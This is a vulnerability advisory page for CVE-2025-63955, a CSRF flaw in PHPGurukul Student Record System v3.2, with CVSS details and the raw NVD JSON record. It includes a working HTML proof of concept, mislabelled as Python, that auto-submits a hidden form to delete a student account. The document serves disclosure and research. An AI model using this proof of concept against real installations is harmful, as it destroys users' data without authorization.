Security Vulnerability Report
中文
CVE-2025-63955 CVSS 7.5 HIGH

CVE-2025-63955

Published: 2025-11-18 19:15:51
Last Modified: 2025-11-20 17:27:59

Description

A Cross-Site Request Forgery (CSRF) vulnerability in the manage-students.php component of PHPGurukul Student Record System v3.2 allows an attacker to trick an authenticated administrator into submitting a forged request. This leads to the unauthorized deletion of user accounts, causing a Denial of Service (DoS).

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:student_record_system:3.2:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Student Record System v3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-63955 - Delete Student Account --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>CSRF PoC - CVE-2025-63955</h1> <p>This PoC demonstrates the CSRF vulnerability in PHPGurukul Student Record System v3.2</p> <form id="csrfForm" action="http://target-site/manage-students.php" method="POST" style="display:none;"> <!-- Delete action parameter --> <input type="hidden" name="action" value="delete"> <!-- Target student account ID to delete --> <input type="hidden" name="account_id" value="123"> <!-- CSRF token - MISSING in vulnerable version --> <!-- <input type="hidden" name="csrf_token" value="VALID_TOKEN"> --> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Alternative: Use fetch API for more control /* fetch('http://target-site/manage-students.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=delete&account_id=123' }); */ </script> <p>If successful, the target student account will be deleted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63955", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:51.307", "lastModified": "2025-11-20T17:27:58.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) vulnerability in the manage-students.php component of PHPGurukul Student Record System v3.2 allows an attacker to trick an authenticated administrator into submitting a forged request. This leads to the unauthorized deletion of user accounts, causing a Denial of Service (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:student_record_system:3.2:*:*:*:*:*:*:*", "matchCriteriaId": "E68A607F-73CA-4800-991A-96066D92F68D"}]}]}], "references": [{"url": "https://github.com/Wayne-arul/CVE-Disclosures/tree/main/CVE-2025-63955", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/student-record-system-php/", "source": "[email protected]", "tags": ["Product"]}]}}